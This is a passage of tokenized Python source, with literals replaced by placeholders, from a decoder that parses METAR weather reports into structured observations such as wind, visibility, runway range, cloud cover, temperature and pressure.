'<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> self . valueIndex = - <NUM_LIT:1> <EOL> self . decoded = <NUM_LIT:0> <EOL> self . standardDecoded = <NUM_LIT:0> <EOL> self . remarksDecoded = <NUM_LIT:0> <EOL> self . remarkIndex = len ( self . data ) <EOL> self . 
foundRemark = False <EOL> value = "<STR_LIT>" <EOL> if self . data : <EOL> value = self . getNext ( False ) <EOL> valLen = len ( value ) <EOL> if value == '<STR_LIT>' : <EOL> return "<STR_LIT>" <EOL> else : <EOL> if self . weatherStations and value not in self . weatherStations : <EOL> return "<STR_LIT>" <EOL> else : <EOL> station = self . weatherStations [ value ] <EOL> if not ( '<STR_LIT>' in station and isinstance ( station [ '<STR_LIT>' ] , float ) and '<STR_LIT>' in station and isinstance ( station [ '<STR_LIT>' ] , float ) ) : <EOL> return "<STR_LIT>" <EOL> if station [ '<STR_LIT>' ] < - <NUM_LIT> or station [ '<STR_LIT>' ] > <NUM_LIT> or station [ '<STR_LIT>' ] < - <NUM_LIT> or station [ '<STR_LIT>' ] > <NUM_LIT> : <EOL> return "<STR_LIT>" <EOL> obs [ '<STR_LIT>' ] = value <EOL> obs [ '<STR_LIT:Name>' ] = station [ '<STR_LIT:Name>' ] . title ( ) <EOL> obs [ '<STR_LIT>' ] = [ station [ '<STR_LIT>' ] , '<STR_LIT>' ] <EOL> obs [ '<STR_LIT>' ] = [ station [ '<STR_LIT>' ] , '<STR_LIT>' ] <EOL> if station [ '<STR_LIT>' ] : <EOL> obs [ '<STR_LIT>' ] = [ int ( station [ '<STR_LIT>' ] . strip ( '<STR_LIT:m>' ) ) , '<STR_LIT>' ] <EOL> obs [ '<STR_LIT>' ] = self . timeStamp <EOL> if station [ '<STR_LIT>' ] : <EOL> obs [ '<STR_LIT>' ] = station [ '<STR_LIT>' ] . title ( ) + "<STR_LIT>" + station [ '<STR_LIT>' ] . title ( ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] = station [ '<STR_LIT>' ] . title ( ) <EOL> value = self . getNext ( ) <EOL> valLen = len ( value ) <EOL> wholeVis = <NUM_LIT:0> <EOL> visDecoded = False <EOL> windDecoded = False <EOL> issuanceDecoded = False <EOL> tempNdewDecoded = False <EOL> altDecoded = False <EOL> forecastConditions = False <EOL> while value : <EOL> getNext = True <EOL> success = False <EOL> if self . foundRemark : <EOL> success = True <EOL> if valLen > <NUM_LIT:2> and value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> if value in self . equipment : <EOL> obs [ '<STR_LIT>' ] = self . 
equipment [ value ] <EOL> else : <EOL> obs [ '<STR_LIT>' ] = value <EOL> elif valLen > <NUM_LIT:3> and value [ <NUM_LIT:0> : <NUM_LIT:3> ] == '<STR_LIT>' and value [ <NUM_LIT:3> : ] . isdigit ( ) : <EOL> obs [ '<STR_LIT>' ] = [ <NUM_LIT:1000> + ( float ( value [ <NUM_LIT:3> : ] ) / <NUM_LIT:10> ) , '<STR_LIT>' ] <EOL> elif value . count ( '<STR_LIT:->' ) == <NUM_LIT:1> and value . split ( '<STR_LIT:->' ) [ <NUM_LIT:0> ] in self . remarks and value . split ( '<STR_LIT:->' ) [ <NUM_LIT:1> ] in self . remarks : <EOL> values = value . split ( '<STR_LIT:->' ) <EOL> values [ <NUM_LIT:0> ] = self . remarks [ values [ <NUM_LIT:0> ] ] <EOL> values [ <NUM_LIT:1> ] = self . remarks [ values [ <NUM_LIT:1> ] ] <EOL> if values [ <NUM_LIT:0> ] . rsplit ( None , <NUM_LIT:1> ) [ <NUM_LIT:0> ] == values [ <NUM_LIT:1> ] . rsplit ( None , <NUM_LIT:1> ) [ <NUM_LIT:0> ] : <EOL> val = "<STR_LIT>" . format ( values [ <NUM_LIT:0> ] . rsplit ( None , <NUM_LIT:1> ) [ <NUM_LIT:1> ] , values [ <NUM_LIT:1> ] . rsplit ( None , <NUM_LIT:1> ) [ <NUM_LIT:1> ] ) <EOL> else : <EOL> val = "<STR_LIT>" . format ( values [ <NUM_LIT:0> ] , values [ <NUM_LIT:1> ] ) <EOL> obs [ '<STR_LIT>' ] . append ( val ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT:P>' and value [ <NUM_LIT:1> : ] . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT:100> <EOL> obs [ '<STR_LIT>' ] = val / <NUM_LIT:10> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT:1>' and value . isdigit ( ) : <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( self . decodeAutoMaintTemp ( value ) ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT:2>' and value . isdigit ( ) : <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( self . decodeAutoMaintTemp ( value ) ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT:3>' and value . 
isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT:100> <EOL> obs [ '<STR_LIT>' ] = val / <NUM_LIT:30> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' and value [ <NUM_LIT:2> : ] . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:2> : ] ) <EOL> obs [ '<STR_LIT>' ] = val / <NUM_LIT:10> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:9> and value [ <NUM_LIT:0> ] == '<STR_LIT:4>' and value . isdigit ( ) : <EOL> for desc , val in [ '<STR_LIT>' , value [ <NUM_LIT:1> : <NUM_LIT:5> ] ] , [ '<STR_LIT>' , value [ <NUM_LIT:5> : ] ] : <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( desc , self . decodeAutoMaintTemp ( val ) ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT:5>' and value . isdigit ( ) : <EOL> if value [ <NUM_LIT:2> : ] == '<STR_LIT>' : <EOL> val = "<STR_LIT>" <EOL> else : <EOL> val = "<STR_LIT>" . format ( float ( value [ <NUM_LIT:2> : ] ) / <NUM_LIT:10> ) <EOL> if value [ <NUM_LIT:1> ] in self . pressureTendency : <EOL> val = "<STR_LIT:U+0020>" + self . pressureTendency [ value [ <NUM_LIT:1> ] ] + val <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT>' and value . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT:100> <EOL> obs [ '<STR_LIT>' ] = val / <NUM_LIT> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] == '<STR_LIT>' and value . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT:100> <EOL> obs [ '<STR_LIT>' ] = val / <NUM_LIT> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . 
format ( val ) ) <EOL> elif valLen == <NUM_LIT:6> and value [ <NUM_LIT:0> : <NUM_LIT:3> ] == '<STR_LIT>' and value . isdigit ( ) : <EOL> val = <NUM_LIT> * float ( value [ <NUM_LIT:2> : ] ) / <NUM_LIT:10> <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' and value . isdigit ( ) : <EOL> val = int ( value [ <NUM_LIT:2> : ] ) <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( val ) ) <EOL> elif valLen == <NUM_LIT:9> and value [ <NUM_LIT:0> ] == '<STR_LIT:T>' and value [ <NUM_LIT:1> : ] . isdigit ( ) : <EOL> for desc , val in [ '<STR_LIT>' , value [ <NUM_LIT:1> : <NUM_LIT:5> ] ] , [ '<STR_LIT>' , value [ <NUM_LIT:5> : ] ] : <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( desc , self . decodeAutoMaintTemp ( val ) ) ) <EOL> elif value in self . visibilityCode : <EOL> pass <EOL> else : <EOL> success = False <EOL> if not success : <EOL> success = True <EOL> if valLen >= <NUM_LIT:7> and value [ <NUM_LIT:0> : <NUM_LIT:6> ] . isdigit ( ) and value [ <NUM_LIT:6> ] == '<STR_LIT>' : <EOL> if issuanceDecoded : <EOL> success = False <EOL> else : <EOL> issuanceDecoded = True <EOL> values = value . split ( '<STR_LIT>' ) <EOL> day = int ( values [ <NUM_LIT:0> ] [ <NUM_LIT:0> : <NUM_LIT:2> ] ) <EOL> month = self . timeStamp . month <EOL> year = self . timeStamp . year <EOL> if abs ( day - self . timeStamp . day ) > <NUM_LIT:20> : <EOL> if self . timeStamp . 
day > day : <EOL> month += <NUM_LIT:1> <EOL> if month > <NUM_LIT:12> : <EOL> year += <NUM_LIT:1> <EOL> month = <NUM_LIT:1> <EOL> else : <EOL> month -= <NUM_LIT:1> <EOL> if month <= <NUM_LIT:0> : <EOL> year -= <NUM_LIT:1> <EOL> month = <NUM_LIT:12> <EOL> obs [ '<STR_LIT>' ] = datetime ( year , month , day , int ( values [ <NUM_LIT:0> ] [ <NUM_LIT:2> : <NUM_LIT:4> ] ) , int ( values [ <NUM_LIT:0> ] [ <NUM_LIT:4> : <NUM_LIT:6> ] ) ) <EOL> if len ( values ) > <NUM_LIT:1> and values [ <NUM_LIT:1> ] : <EOL> value = values [ <NUM_LIT:1> ] <EOL> valLen = len ( value ) <EOL> getNext = False <EOL> elif value in self . obsType : <EOL> obs [ '<STR_LIT>' ] = self . obsType [ value ] <EOL> elif value . endswith ( '<STR_LIT>' ) or value . endswith ( '<STR_LIT>' ) or value . endswith ( '<STR_LIT>' ) or value . endswith ( '<STR_LIT>' ) : <EOL> if windDecoded and not ( self . foundRemark or forecastConditions ) : <EOL> success = False <EOL> else : <EOL> windDecoded = True <EOL> if self . foundRemark : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : self . decodeWindConditions ( value ) } ) <EOL> elif forecastConditions : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : self . decodeWindConditions ( value ) } ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] = self . decodeWindConditions ( value ) <EOL> elif ( valLen <= <NUM_LIT:2> ) and value . isdigit ( ) : <EOL> if visDecoded and not ( self . foundRemark or forecastConditions ) : <EOL> success = False <EOL> else : <EOL> wholeVis = int ( value ) <EOL> elif valLen > <NUM_LIT:2> and value . endswith ( '<STR_LIT>' ) : <EOL> if visDecoded and not ( self . foundRemark or forecastConditions ) : <EOL> success = False <EOL> else : <EOL> visDecoded = True <EOL> if value [ <NUM_LIT:0> ] in self . qualifier : <EOL> val = self . 
qualifier [ value [ <NUM_LIT:0> ] ] <EOL> value = value [ <NUM_LIT:1> : valLen ] <EOL> valLen = len ( value ) <EOL> else : <EOL> val = None <EOL> val = None <EOL> value = value [ <NUM_LIT:0> : ( valLen - <NUM_LIT:2> ) ] . split ( '<STR_LIT:/>' ) <EOL> valLen = len ( value ) <EOL> if valLen > <NUM_LIT:1> : <EOL> if value [ <NUM_LIT:0> ] . isdigit ( ) and value [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> val = ( wholeVis + ( float ( value [ <NUM_LIT:0> ] ) / float ( value [ <NUM_LIT:1> ] ) ) ) * <NUM_LIT> <EOL> wholeVis = <NUM_LIT:0> <EOL> else : <EOL> if value [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> val = int ( value [ <NUM_LIT:0> ] ) * <NUM_LIT> <EOL> if val : <EOL> if self . foundRemark : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : { '<STR_LIT>' : val } } ) <EOL> elif forecastConditions : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : { '<STR_LIT>' : val } } ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = val <EOL> elif ( ( valLen == <NUM_LIT:4> and value . isdigit ( ) ) or <EOL> ( valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] in self . qualifier and value [ <NUM_LIT:1> : ] . isdigit ( ) ) or <EOL> ( valLen >= <NUM_LIT:7> and valLen <= <NUM_LIT:8> and value . endswith ( '<STR_LIT>' ) and value [ ( valLen - <NUM_LIT:7> ) : ( valLen - <NUM_LIT:3> ) ] . isdigit ( ) ) ) : <EOL> if visDecoded and not ( self . foundRemark or forecastConditions ) : <EOL> success = False <EOL> else : <EOL> visDecoded = True <EOL> val = { <EOL> } <EOL> value = value . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> valLen = len ( value ) <EOL> if value [ <NUM_LIT:0> ] in self . qualifier : <EOL> val [ '<STR_LIT>' ] = self . qualifier [ value [ <NUM_LIT:0> ] ] <EOL> value = value [ <NUM_LIT:1> : valLen ] <EOL> valLen = len ( value ) <EOL> else : <EOL> val [ '<STR_LIT>' ] = None <EOL> val [ '<STR_LIT>' ] = None <EOL> if value == '<STR_LIT>' : <EOL> val [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> else : <EOL> val [ '<STR_LIT>' ] = int ( value ) / <NUM_LIT:1000> <EOL> value = self . 
peekNext ( ) <EOL> valLen = len ( value ) <EOL> if valLen >= <NUM_LIT:4> and value [ <NUM_LIT:0> : <NUM_LIT:4> ] . isdigit ( ) : <EOL> if valLen == <NUM_LIT:4> : <EOL> val [ '<STR_LIT>' ] = "<STR_LIT>" . format ( int ( value ) ) <EOL> else : <EOL> if value [ <NUM_LIT:4> : ] and value [ <NUM_LIT:4> : ] . strip ( '<STR_LIT>' ) == "<STR_LIT>" : <EOL> val [ '<STR_LIT>' ] = "<STR_LIT>" . format ( int ( value [ <NUM_LIT:0> : <NUM_LIT:4> ] ) ) <EOL> if value [ <NUM_LIT:4> : ] in self . direction : <EOL> val [ '<STR_LIT>' ] = [ self . direction [ value [ <NUM_LIT:4> : ] ] , '<STR_LIT>' ] <EOL> self . getNext ( ) <EOL> if self . foundRemark : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : val } ) <EOL> elif forecastConditions : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : val } ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] = val <EOL> elif value == '<STR_LIT>' : <EOL> if visDecoded and not ( self . foundRemark or forecastConditions ) : <EOL> success = False <EOL> else : <EOL> visDecoded = True <EOL> val = "<STR_LIT>" <EOL> if self . foundRemark : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : { '<STR_LIT>' : val } } ) <EOL> elif forecastConditions : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : { '<STR_LIT>' : val } } ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = val <EOL> elif valLen >= <NUM_LIT:3> and ( value [ <NUM_LIT:0> ] == '<STR_LIT:R>' ) and value [ <NUM_LIT:1> : <NUM_LIT:3> ] . isdigit ( ) : <EOL> Runway = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> for rvr in value . split ( "<STR_LIT:/>" ) : <EOL> if rvr : <EOL> if rvr [ <NUM_LIT:0> ] == '<STR_LIT:R>' and len ( rvr ) > <NUM_LIT:2> : <EOL> if len ( rvr ) == <NUM_LIT:3> : <EOL> Runway [ '<STR_LIT>' ] = "<STR_LIT>" . format ( int ( rvr [ <NUM_LIT:1> : ] ) ) <EOL> else : <EOL> Runway [ '<STR_LIT>' ] = "<STR_LIT>" . format ( int ( rvr [ <NUM_LIT:1> : <NUM_LIT:3> ] ) , rvr [ <NUM_LIT:3> : ] ) <EOL> elif rvr in self . tendency : <EOL> Runway [ '<STR_LIT>' ] = self . 
tendency [ rvr ] <EOL> else : <EOL> if rvr . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> units = <NUM_LIT> <EOL> else : <EOL> units = <NUM_LIT:1> <EOL> for var in rvr . split ( '<STR_LIT>' ) : <EOL> varOff = <NUM_LIT:0> <EOL> varLen = len ( var ) <EOL> varVal = '<STR_LIT>' <EOL> if var [ <NUM_LIT:0> ] in self . qualifier : <EOL> varVal = self . qualifier [ var [ <NUM_LIT:0> ] ] <EOL> varOff += <NUM_LIT:1> <EOL> if var [ varLen - <NUM_LIT:1> ] in self . tendency : <EOL> varLen -= <NUM_LIT:1> <EOL> Runway [ '<STR_LIT>' ] = self . tendency [ var [ varLen ] ] <EOL> if var . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> varLen -= <NUM_LIT:2> <EOL> if var [ varOff : varLen ] . isdigit ( ) : <EOL> varVal += "<STR_LIT>" . format ( int ( float ( var [ varOff : varLen ] ) * units ) ) <EOL> if '<STR_LIT>' not in Runway : <EOL> Runway [ '<STR_LIT>' ] = varVal <EOL> else : <EOL> Runway [ '<STR_LIT>' ] = Runway [ '<STR_LIT>' ] <EOL> Runway [ '<STR_LIT>' ] = varVal <EOL> obs [ '<STR_LIT>' ] . append ( Runway ) <EOL> elif ( valLen >= <NUM_LIT:3> and value [ <NUM_LIT:0> : <NUM_LIT:3> ] in self . coverage ) or ( valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> : <NUM_LIT:2> ] in self . coverage ) : <EOL> val = self . decodeCloudCover ( value ) <EOL> if val : <EOL> if self . foundRemark : <EOL> obs [ '<STR_LIT>' ] . append ( val ) <EOL> elif forecastConditions : <EOL> obs [ '<STR_LIT>' ] . append ( val ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] . append ( val ) <EOL> else : <EOL> success = False <EOL> val = self . decodeTotalCloudCover ( value ) <EOL> if obs [ '<STR_LIT>' ] : <EOL> if val > obs [ '<STR_LIT>' ] : <EOL> obs [ '<STR_LIT>' ] = val <EOL> else : <EOL> obs [ '<STR_LIT>' ] = val <EOL> val = self . decodeCloudCeiling ( value ) <EOL> if obs [ '<STR_LIT>' ] : <EOL> if val < obs [ '<STR_LIT>' ] : <EOL> obs [ '<STR_LIT>' ] = val <EOL> else : <EOL> obs [ '<STR_LIT>' ] = val <EOL> elif ( valLen >= <NUM_LIT:3> and valLen <= <NUM_LIT:7> ) and ( value . 
count ( '<STR_LIT:/>' ) >= <NUM_LIT:1> ) and value . strip ( '<STR_LIT:M>' ) [ <NUM_LIT:0> : <NUM_LIT:2> ] . isdigit ( ) : <EOL> if tempNdewDecoded : <EOL> success = False <EOL> else : <EOL> tempNdewDecoded = True <EOL> values = value . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> if values and values [ <NUM_LIT:0> ] : <EOL> for val in values : <EOL> if val . strip ( '<STR_LIT:M>' ) . isdigit ( ) : <EOL> units = <NUM_LIT:1> <EOL> if val [ <NUM_LIT:0> ] == '<STR_LIT:M>' : <EOL> units = - <NUM_LIT:1> <EOL> val = [ int ( val . strip ( '<STR_LIT:M>' ) ) * units , '<STR_LIT>' ] <EOL> if not obs [ '<STR_LIT>' ] : <EOL> obs [ '<STR_LIT>' ] = val <EOL> else : <EOL> obs [ '<STR_LIT>' ] = val <EOL> if obs [ '<STR_LIT>' ] : <EOL> if obs [ '<STR_LIT>' ] : <EOL> val = ALFlib . relativeHumidity ( obs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , obs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) <EOL> if val : <EOL> obs [ '<STR_LIT>' ] = [ int ( round ( val ) ) , '<STR_LIT>' ] <EOL> val = ALFlib . heatIndex ( obs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , val ) <EOL> if val : <EOL> obs [ '<STR_LIT>' ] = [ round ( val * <NUM_LIT:10> ) / <NUM_LIT:10> , '<STR_LIT>' ] <EOL> if '<STR_LIT>' in obs [ '<STR_LIT>' ] and obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] and obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> val = ALFlib . windChill ( obs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) <EOL> if val : <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = [ round ( val * <NUM_LIT:10> ) / <NUM_LIT:10> , '<STR_LIT>' ] <EOL> else : <EOL> success = False <EOL> elif valLen == <NUM_LIT:5> and ( value [ <NUM_LIT:0> ] == '<STR_LIT:A>' or value [ <NUM_LIT:0> ] == '<STR_LIT>' ) and value [ <NUM_LIT:1> : ] . 
isdigit ( ) : <EOL> if not altDecoded : <EOL> altDecoded = True <EOL> if value [ <NUM_LIT:0> ] == '<STR_LIT:A>' : <EOL> obs [ '<STR_LIT>' ] = [ round ( float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT> , <NUM_LIT:1> ) , '<STR_LIT>' ] <EOL> else : <EOL> obs [ '<STR_LIT>' ] = [ float ( value [ <NUM_LIT:1> : ] ) , '<STR_LIT>' ] <EOL> elif not value . replace ( '<STR_LIT:/>' , '<STR_LIT>' ) : <EOL> pass <EOL> elif valLen >= <NUM_LIT:3> and value [ <NUM_LIT:0> : <NUM_LIT:3> ] in self . visibilityCode : <EOL> pass <EOL> elif value == '<STR_LIT>' : <EOL> obs [ '<STR_LIT>' ] . append ( self . remarks [ value ] ) <EOL> elif valLen >= <NUM_LIT:4> and value [ <NUM_LIT:0> : <NUM_LIT:4> ] == '<STR_LIT>' : <EOL> obs [ '<STR_LIT>' ] . append ( self . remarks [ '<STR_LIT>' ] ) <EOL> elif value == '<STR_LIT>' or value == '<STR_LIT>' : <EOL> obs [ '<STR_LIT>' ] . append ( self . remarks [ value ] ) <EOL> forecastConditions = True <EOL> elif valLen == <NUM_LIT:6> and ( value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' or value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' or value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' ) and value [ <NUM_LIT:2> : ] . isdigit ( ) : <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( self . remarks [ value [ <NUM_LIT:0> : <NUM_LIT:2> ] ] , value [ <NUM_LIT:2> : <NUM_LIT:4> ] , value [ <NUM_LIT:4> : ] ) ) <EOL> forecastConditions = True <EOL> else : <EOL> if valLen > <NUM_LIT:2> and value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> weatherType = '<STR_LIT>' <EOL> val = self . decodeWeatherObscuration ( value [ <NUM_LIT:2> : ] ) <EOL> else : <EOL> if forecastConditions : <EOL> weatherType = '<STR_LIT>' <EOL> else : <EOL> weatherType = '<STR_LIT>' <EOL> val = self . decodeWeatherObscuration ( value ) <EOL> if val : <EOL> obs [ weatherType ] . append ( val ) <EOL> if '<STR_LIT>' in val . lower ( ) : <EOL> obs [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> else : <EOL> success = False <EOL> if getNext : <EOL> value = self . 
getNext ( success ) <EOL> valLen = len ( value ) <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = int ( float ( self . decoded ) / float ( len ( self . data ) ) * <NUM_LIT:100> ) <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = int ( float ( self . standardDecoded ) / float ( self . remarkIndex ) * <NUM_LIT:100> ) <EOL> if ( len ( self . data ) - self . remarkIndex ) > <NUM_LIT:0> : <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = int ( float ( self . remarksDecoded ) / float ( len ( self . data ) - self . remarkIndex ) * <NUM_LIT:100> ) <EOL> return obs <EOL> def decodeAutoMaintTemp ( self , value ) : <EOL> val = float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT:10> <EOL> if value [ <NUM_LIT:0> ] == '<STR_LIT:1>' : <EOL> val *= - <NUM_LIT:1> <EOL> return val <EOL> def decodeWindConditions ( self , value ) : <EOL> valLen = len ( value ) <EOL> wind = { <EOL> } <EOL> if value [ <NUM_LIT:0> : <NUM_LIT:3> ] . isdigit ( ) and int ( value [ <NUM_LIT:0> : <NUM_LIT:3> ] ) > <NUM_LIT:0> : <EOL> wind [ '<STR_LIT>' ] = [ int ( value [ <NUM_LIT:0> : <NUM_LIT:3> ] ) , '<STR_LIT>' ] <EOL> offset = valLen - <NUM_LIT:3> <EOL> if value [ offset ] . isdigit ( ) : <EOL> offset += <NUM_LIT:1> <EOL> units = value [ offset : valLen ] <EOL> if units . startswith ( '<STR_LIT>' ) : <EOL> units = <NUM_LIT> <EOL> elif units == '<STR_LIT>' : <EOL> units = <NUM_LIT> <EOL> else : <EOL> units = <NUM_LIT:1> <EOL> values = value [ <NUM_LIT:3> : offset ] . split ( '<STR_LIT>' ) <EOL> if values [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> wind [ '<STR_LIT>' ] = [ int ( round ( float ( values [ <NUM_LIT:0> ] ) * units ) ) , '<STR_LIT>' ] <EOL> if len ( values ) == <NUM_LIT:2> and values [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> wind [ '<STR_LIT>' ] = [ int ( round ( float ( values [ <NUM_LIT:1> ] ) * units ) ) , '<STR_LIT>' ] <EOL> values = self . peekNext ( ) . split ( '<STR_LIT>' ) <EOL> if len ( values ) == <NUM_LIT:2> and values [ <NUM_LIT:0> ] . isdigit ( ) and values [ <NUM_LIT:1> ] . 
isdigit ( ) : <EOL> From = int ( values [ <NUM_LIT:0> ] ) <EOL> To = int ( values [ <NUM_LIT:1> ] ) <EOL> if '<STR_LIT>' not in wind : <EOL> wind [ '<STR_LIT>' ] = [ <NUM_LIT:0> , '<STR_LIT>' ] <EOL> wind [ '<STR_LIT>' ] . append ( From ) <EOL> wind [ '<STR_LIT>' ] . append ( To ) <EOL> if wind [ '<STR_LIT>' ] [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> if To < From : <EOL> To += <NUM_LIT> <EOL> wind [ '<STR_LIT>' ] [ <NUM_LIT:0> ] = From + ( float ( To - From ) / <NUM_LIT:2> ) <EOL> if wind [ '<STR_LIT>' ] [ <NUM_LIT:0> ] > <NUM_LIT> : <EOL> wind [ '<STR_LIT>' ] [ <NUM_LIT:0> ] -= <NUM_LIT> <EOL> self . getNext ( ) <EOL> return wind <EOL> def decodeCloudCover ( self , value ) : <EOL> desc = '<STR_LIT>' <EOL> height = '<STR_LIT>' <EOL> type = '<STR_LIT>' <EOL> valLen = len ( value ) <EOL> valOff = <NUM_LIT:0> <EOL> if value [ <NUM_LIT:0> : <NUM_LIT:3> ] in self . coverage : <EOL> valOff = <NUM_LIT:3> <EOL> desc = self . coverage [ value [ <NUM_LIT:0> : <NUM_LIT:3> ] ] <EOL> elif value [ <NUM_LIT:0> : <NUM_LIT:2> ] in self . coverage and valLen == <NUM_LIT:5> : <EOL> valOff = <NUM_LIT:2> <EOL> desc = self . coverage [ value [ <NUM_LIT:0> : <NUM_LIT:2> ] ] <EOL> if valLen >= <NUM_LIT:5> : <EOL> if value [ valOff : ( valOff + <NUM_LIT:3> ) ] . isdigit ( ) : <EOL> val = float ( value [ valOff : ( valOff + <NUM_LIT:3> ) ] ) * <NUM_LIT> <EOL> if val >= <NUM_LIT:1000> : <EOL> val = int ( round ( val / <NUM_LIT:100> ) * <NUM_LIT:100> ) <EOL> else : <EOL> val = int ( round ( val / <NUM_LIT:10> ) * <NUM_LIT:10> ) <EOL> height = "<STR_LIT>" . format ( val ) <EOL> if value . endswith ( '<STR_LIT>' ) : <EOL> type = "<STR_LIT:U+0020>" + self . remarks [ '<STR_LIT>' ] <EOL> elif value . endswith ( '<STR_LIT>' ) : <EOL> type = "<STR_LIT:U+0020>" + self . remarks [ '<STR_LIT>' ] <EOL> else : <EOL> type = "<STR_LIT>" <EOL> return ( desc . 
format ( type ) + height ) <EOL> def decodeTotalCloudCover ( self , value ) : <EOL> val = <NUM_LIT:0> <EOL> if value [ <NUM_LIT:0> : <NUM_LIT:3> ] in self . totalCloudCover : <EOL> val = self . totalCloudCover [ value [ <NUM_LIT:0> : <NUM_LIT:3> ] ] <EOL> return val <EOL> def decodeCloudCeiling ( self , value ) : <EOL> desc = '<STR_LIT>' <EOL> height = None <EOL> type = '<STR_LIT>' <EOL> valLen = len ( value ) <EOL> valOff = <NUM_LIT:0> <EOL> if value [ <NUM_LIT:0> : <NUM_LIT:3> ] in self . coverage : <EOL> valOff = <NUM_LIT:3> <EOL> desc = self . coverage [ value [ <NUM_LIT:0> : <NUM_LIT:3> ] ] <EOL> elif value [ <NUM_LIT:0> : <NUM_LIT:2> ] in self . coverage and valLen == <NUM_LIT:5> : <EOL> valOff = <NUM_LIT:2> <EOL> desc = self . coverage [ value [ <NUM_LIT:0> : <NUM_LIT:2> ] ] <EOL> if valLen >= <NUM_LIT:5> : <EOL> if value [ valOff : ( valOff + <NUM_LIT:3> ) ] . isdigit ( ) : <EOL> val = float ( value 